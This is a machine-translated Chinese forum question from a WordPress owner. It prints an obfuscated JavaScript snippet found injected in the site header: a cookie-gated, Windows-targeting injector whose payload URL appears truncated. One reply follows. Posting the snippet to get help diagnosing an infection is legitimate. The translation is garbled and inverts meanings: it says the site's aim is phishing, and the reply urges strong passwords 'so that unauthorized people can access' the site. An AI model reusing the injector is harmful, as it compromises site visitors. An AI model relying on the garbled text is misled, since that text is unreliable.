我有一个WordPress安装,其目标是网络钓鱼操作。我以为我的安全性大部分都被覆盖了,除非我在标题中找到了这个:
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
最后的网址是超级可疑的。我用谷歌搜索但没有发现任何线索: - (
我还没有在WP安装中找到代码的来源。它没有写入模板文件或数据库。在现在更新WP安装的过程中。
有没有人知道这个?
答案 0 :(得分:0)
这对我来说很奇怪。也许尝试重新安装wordpress并选择非常复杂的密码,以便未经授权的人可以访问您的网站。您可能希望从页面中删除Google Analytics分析代码,看看是否会产生影响。复杂的密码包括数字,大写和小写字母,斜杠以及您能想到的任何其他内容。确保它长于8个字母。如果您的网站受到感染,请立即从网站上删除,直到您确定不是。